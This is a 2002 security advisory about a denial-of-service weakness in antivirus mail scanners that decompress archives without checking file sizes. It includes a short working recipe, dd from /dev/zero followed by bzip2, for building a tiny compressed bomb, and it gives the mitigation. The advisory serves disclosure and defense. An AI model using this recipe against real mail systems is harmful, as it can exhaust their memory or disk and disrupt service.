----------------------------------- -----[ SECURITY ANNOUNCEMENT ]----- ----------------------------------- iNetd Security Research Annoucement Name: Anti Virus Mailscanners DOS Systems Affected: System independant Date: 25/02/2002 Subject: Potential DOS. Severity: HIGH Author: Eduardo R. Maciel (maciel@inetd.com.br) Description =========== An antivirus mailscanner should check the filesizes inside a compressed file like .tar.gz, .zip, .bz2, etc, BEFORE open the file for scanning. All the products that doesn't do that checking are vulnerable to a Denial Of Service attack. Pay attention to the procedure below: root@maciel:/tmp# dd if=/dev/zero of=/tmp/file count=200000 root@maciel:/tmp# ls -l /tmp/file -rw-r--r-- 1 root root 102400000 Feb 24 22:13 file root@maciel:/tmp# bzip2 -z file root@maciel:/tmp# ls -l /tmp/file.bz2 rw-r--r-- 1 root root 113 Feb 24 22:14 file Since the file has only null (numerical zeros, not the ASCII kind) characters, the size of the compressed file was reduced to a almost insignificant value. Sending several mails with these compressed files may let a machine out of memory or disk space. Solution ======== The mailscanner should check the filesizes inside a compressed file. Credits: Eduardo R. Maciel maciel@inetd.com.br
